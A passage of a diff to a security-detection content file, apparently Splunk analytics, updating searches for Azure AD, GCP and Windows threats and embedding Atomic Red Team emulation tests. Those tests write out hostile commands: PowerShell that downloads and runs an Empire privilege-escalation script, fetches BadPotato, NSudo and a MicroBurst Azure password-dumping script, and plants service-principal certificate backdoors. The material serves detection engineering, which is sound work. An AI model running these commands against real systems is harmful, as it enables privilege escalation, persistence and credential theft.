Injection Remote Thread", "analytic_story": [ "Qakbot", - "Graceful Wipe Out Attack" + "Graceful Wipe Out Attack", + "Warzone RAT" ], "asset_type": "80", "cis20": [ @@ -420367,7 +425025,7 @@ { "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low.", - "search": " `azuread` body.category=UserRiskEvents body.properties.riskLevel=high | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", + "search": " `azuread` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", "tags": { "name": "Azure Active Directory High Risk Sign-in", "analytic_story": [ @@ -420381,7 +425039,7 @@ "Weaponization", "Exploitation" ], - "message": "A high risk event was identified by Identify Protection for user $body.properties.userPrincipalName$", + "message": "A high risk event was identified by Identify Protection for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -420471,7 +425129,7 @@ { "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. ", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", "tags": { "name": "Azure AD Authentication Failed During MFA Challenge", "analytic_story": [ @@ -420487,7 +425145,7 @@ "Delivery", "Installation" ], - "message": "User $body.properties.userPrincipalName$ failed to pass MFA challenge", + "message": "User $userPrincipalName$ failed to pass MFA challenge", "mitre_attack_id": [ "T1586", "T1586.003", @@ -420615,7 +425273,7 @@ { "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users.", - "search": "`azuread` body.category=AuditLogs body.operationName=\"Disable Strong Authentication\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, type, body.operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", + "search": "`azuread` category=AuditLogs operationName=\"Disable Strong Authentication\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, type, operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", "tags": { "name": "Azure AD Multi-Factor Authentication Disabled", "analytic_story": [ @@ -420704,7 +425362,7 @@ { "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(userPrincipalName) by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(ipAddress) as ipAddress by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "Azure AD Multiple Failed MFA Requests For User", "analytic_story": [ @@ -420720,7 +425378,7 @@ "Delivery", "Installation" ], - "message": "Multiple Failed MFA requests for user $body.properties.userPrincipalName$", + "message": "Multiple Failed MFA requests for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -420738,13 +425396,6 @@ "role": [ "Victim" ] - }, - { - "name": "ipAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], "risk_score": 54, @@ -420848,7 +425499,7 @@ { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nAzure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed.", - "search": " `azuread` body.category= SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", "tags": { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "analytic_story": [ @@ -420862,7 +425513,7 @@ "Weaponization", "Exploitation" ], - "message": "Source Ip $body.properties.ipAddress$ failed to authenticate with 30 users within 5 minutes.", + "message": "Source Ip $ipAddress$ failed to authenticate with 30 users within 5 minutes.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -420963,7 +425614,7 @@ { "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationDetails{}.succeeded=true body.properties.appDisplayName=\"Azure Active Directory PowerShell\" | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName=\"Microsoft Azure PowerShell\" | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", "tags": { "name": "Azure AD Successful PowerShell Authentication", "analytic_story": [ @@ -420979,7 +425630,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ using PowerShell.", + "message": "Successful authentication for user $userPrincipalName$ using PowerShell.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -421095,7 +425746,7 @@ { "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationRequirement=singleFactorAuthentication body.properties.authenticationDetails{}.succeeded=true | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", "tags": { "name": "Azure AD Successful Single-Factor Authentication", "analytic_story": [ @@ -421111,7 +425762,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ without MFA", + "message": "Successful authentication for user $userPrincipalName$ without MFA", "mitre_attack_id": [ "T1586", "T1586.003", @@ -421227,7 +425878,7 @@ { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\\\nThe detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nWhile looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "analytic_story": [ @@ -421241,7 +425892,7 @@ "Weaponization", "Exploitation" ], - "message": "Possible Password Spraying attack against Azure AD from source ip $body.properties.ipAddress$", + "message": "Possible Password Spraying attack against Azure AD from source ip $ipAddress$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -421857,7 +426508,7 @@ { "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", + "search": "`gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "GCP Multiple Failed MFA Requests For User", "analytic_story": [ @@ -421893,7 +426544,7 @@ ] }, { - "name": null, + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" @@ -424007,7 +428658,8 @@ "analytic_story": [ "Data Destruction", "WhisperGate", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -430194,7 +434846,7 @@ { "name": "Windows Mshta Execution In Registry", "description": "The following analytic identifies the usage of mshta.exe Windows binary in registry to execute malicious script. This technique was seen in kovter malware where it create several registry entry which is a encoded javascript and will be executed by another registry containing mshta and javascript activexobject to execute the encoded script using wscript.shell. This TTP is a good indication of kovter malware or other adversaries or threat actors leveraging fileless detection that survive system reboot.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_value_data = \"*mshta*\" OR Registry.registry_value_data IN (\"*javascript:*\", \"*vbscript:*\",\"*WScript.Shell*\") by Registry.registry_key_name Registry.registry_path Registry.registry_value_data Registry.action Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_mshta_execution_in_registry_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_value_data = \"*mshta*\" OR Registry.registry_value_data IN (\"*javascript:*\", \"*vbscript:*\",\"*WScript.Shell*\") by Registry.registry_key_name Registry.registry_path Registry.registry_value_data Registry.action Registry.dest Registry.user| `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_mshta_execution_in_registry_filter`", "tags": { "name": "Windows Mshta Execution In Registry", "analytic_story": [ @@ -430208,7 +434860,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "a registry $registry_path$ contains mshta $registry_value_data$ in $dest$", + "message": "A registry $registry_path$ contains mshta $registry_value_data$ in $dest$", "mitre_attack_id": [ "T1218.005" ], @@ -433376,8 +438028,8 @@ "command_list": [ "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose\n", - "Start-Process \\..\\ExternalPayloads\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe -Argument \"-U:T -P:E cmd\"\nStart-Sleep -Second 5\nStop-Process -Name \"cmd\" -force -erroraction silentlycontinue\n", - "cd PathToAtomicsFolder\\..\\ExternalPayloads\nStart-Process .\\BadPotato.exe notepad.exe\nStart-Sleep -Second 20\nStop-Process -Name \"notepad\" -force -erroraction silentlycontinue\nStop-Process -Name \"BadPotato\" -force -erroraction silentlycontinue\n" + "Start-Process \"\\..\\ExternalPayloads\\NSudo_8.2_All_Components\\NSudo_Launcher\\x64\\NSudoLG.exe\" -Argument \"-U:T -P:E cmd\"\nStart-Sleep -Second 5\nStop-Process -Name \"cmd\" -force -erroraction silentlycontinue\n", + "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\nStart-Process .\\BadPotato.exe notepad.exe\nStart-Sleep -Second 20\nStop-Process -Name \"notepad\" -force -erroraction silentlycontinue\nStop-Process -Name \"BadPotato\" -force -erroraction silentlycontinue\n" ], "commands": [], "queries": [], @@ -433433,12 +438085,12 @@ "dependencies": [ { "description": "NSudo.bat must exist in the specified path #{nsudo_path}\n", - "prereq_command": "if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{nsudo_path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\NSudo_8.2_All_Components.zip\" \"https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\NSudo_8.2_All_Components.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\NSudo_8.2_All_Components\" -Force\nRename-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\NSudo_8.2_All_Components\\NSudo Launcher\\x64\\NSudoLG.exe\" \"#{nsudo_path}\"\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\NSudo_8.2_All_Components.zip\" -Recurse -ErrorAction Ignore\n" } ], "executor": { - "command": "Start-Process #{nsudo_path} -Argument \"-U:T -P:E cmd\"\nStart-Sleep -Second 5\nStop-Process -Name \"cmd\" -force -erroraction silentlycontinue\n", + "command": "Start-Process \"#{nsudo_path}\" -Argument \"-U:T -P:E cmd\"\nStart-Sleep -Second 5\nStop-Process -Name \"cmd\" -force -erroraction silentlycontinue\n", "name": "powershell" } }, @@ -433453,12 +438105,12 @@ "dependencies": [ { "description": "BadPotato.exe must exist in the temp directory\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\BadPotato.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\BadPotato.exe \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true\"\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\BadPotato.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\BadPotato.exe\" \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true\"\n" } ], "executor": { - "command": "cd PathToAtomicsFolder\\..\\ExternalPayloads\nStart-Process .\\BadPotato.exe notepad.exe\nStart-Sleep -Second 20\nStop-Process -Name \"notepad\" -force -erroraction silentlycontinue\nStop-Process -Name \"BadPotato\" -force -erroraction silentlycontinue\n", + "command": "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\nStart-Process .\\BadPotato.exe notepad.exe\nStart-Sleep -Second 20\nStop-Process -Name \"notepad\" -force -erroraction silentlycontinue\nStop-Process -Name \"BadPotato\" -force -erroraction silentlycontinue\n", "cleanup_command": "taskkill /f /im notepad.exe\n", "name": "powershell", "elevation_required": true @@ -433759,7 +438411,7 @@ { "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "description": "The following analytic identifies a process requesting access in winlogon.exe to duplicate its handle with a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges to their process. This duplicate handle access technique, may refer to a malicious process duplicating the process token of winlogon.exe and using it to a new process instance. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens.", - "search": "`sysmon` EventCode=10 TargetImage IN(\"*\\\\system32\\\\winlogon.exe*\", \"*\\\\SysWOW64\\\\winlogon.exe*\") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN(\"C:\\\\Windows\\\\*\", \"C:\\\\Program File*\", \"%systemroot%\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter`", + "search": "`sysmon` EventCode=10 TargetImage IN(\"*\\\\system32\\\\winlogon.exe*\", \"*\\\\SysWOW64\\\\winlogon.exe*\") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN(\"C:\\\\Windows\\\\*\", \"C:\\\\Program File*\", \"%systemroot%\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter`", "tags": { "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "analytic_story": [ @@ -433772,7 +438424,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "a process $SourceImage$ is duplicating the handle token of winlogon.exe in $Computer$", + "message": "A process $SourceImage$ is duplicating the handle token of winlogon.exe on $dest$", "mitre_attack_id": [ "T1134.001", "T1134" @@ -433782,7 +438434,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -436958,7 +441610,7 @@ "dependencies": [ { "description": "The Get-AzurePasswords script must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzurePasswords.ps1){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzurePasswords.ps1\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzurePasswords.ps1\"\n" }, { @@ -438163,7 +442815,7 @@ "command_list": [ "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n$sp = Get-AzureADServicePrincipal -SearchString \"SuperSP\" | Select-Object -First 1\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$credNotAfter = (Get-Date).AddDays(1)\n$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry\n\n$cert = New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation Cert:\\CurrentUser\\My -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\nWrite-Host \"Generated certificate \"\"$($cert.Thumbprint)\"\"\"\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant = Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n$app = Get-AzureADApplication -SearchString \"SuperApp\" | Select-Object -First 1\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$credNotAfter = (Get-Date).AddDays(1)\n$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry\n\n$cert = New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation Cert:\\CurrentUser\\My -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\nWrite-Host \"Generated certificate \"\"$($cert.Thumbprint)\"\"\"\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant = Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", - "aws iam create-access-key --user-name atomicredteam > /T1098.001/bin/aws_secret.creds\ncd /T1098.001/bin/\n./aws_secret.sh\n" + "aws iam create-access-key --user-name atomicredteam > \"/T1098.001/bin/aws_secret.creds\"\ncd \"/T1098.001/bin/\"\n./aws_secret.sh\n" ], "commands": [], "queries": [], @@ -438275,8 +442927,8 @@ } ], "executor": { - "command": "aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n", - "cleanup_command": "access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`\naws iam delete-access-key --access-key-id $access_key --user-name #{username}\nrm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\n", + "command": "aws iam create-access-key --user-name #{username} > \"$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\"\ncd \"$PathToAtomicsFolder/T1098.001/bin/\"\n./aws_secret.sh\n", + "cleanup_command": "access_key=`cat \"$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\" | jq -r '.AccessKey.AccessKeyId'`\naws iam delete-access-key --access-key-id $access_key --user-name #{username}\nrm \"$PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\"\n", "name": "sh" } } @@ -438710,7 +443362,7 @@ { "name": "Azure AD Service Principal New Client Credentials", "description": "The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account who is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal.", - "search": " `azuread` body.category=AuditLogs body.operationName=\"Update application*Certificates and secrets management \" | rename body.* as * | rename properties.* as * | rename targetResources{}.* as * | stats values(displayName) by _time, initiatedBy.user.userPrincipalName, modifiedProperties{}.newValue | `azure_ad_service_principal_new_client_credentials_filter`", + "search": " `azuread` category=AuditLogs operationName=\"Update application*Certificates and secrets management \" | rename * as * | rename properties.* as * | rename targetResources{}.* as * | stats values(displayName) as displayName by _time, initiatedBy.user.userPrincipalName, modifiedProperties{}.newValue | `azure_ad_service_principal_new_client_credentials_filter`", "tags": { "name": "Azure AD Service Principal New Client Credentials", "analytic_story": [ @@ -438724,7 +443376,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "New credentials added for Service Principal $body.properties.targetResources{}.displayName$", + "message": "New credentials added for Service Principal $properties.targetResources{}.displayName$", "mitre_attack_id": [ "T1098", "T1098.001" @@ -441855,7 +446507,7 @@ { "name": "Clop Common Exec Parameter", "description": "The following analytics are designed to identifies some CLOP ransomware variant that using arguments to execute its main code or feature of its code. In this variant if the parameter is \"runrun\", CLOP ransomware will try to encrypt files in network shares and if it is \"temp.dat\", it will try to read from some stream pipe or file start encrypting files within the infected local machines. This technique can be also identified as an anti-sandbox technique to make its code non-responsive since it is waiting for some parameter to execute properly.", - "search": "| tstats `security_content_summariesonly` values(Processes.process) as cmdline values(Processes.parent_process_name) as parent_process values(Processes.process_name) count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name != \"*temp.dat*\" Processes.process = \"*runrun*\" OR Processes.process = \"*temp.dat*\" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_common_exec_parameter_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name != \"*temp.dat*\" Processes.process = \"*runrun*\" OR Processes.process = \"*temp.dat*\" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_common_exec_parameter_filter`", 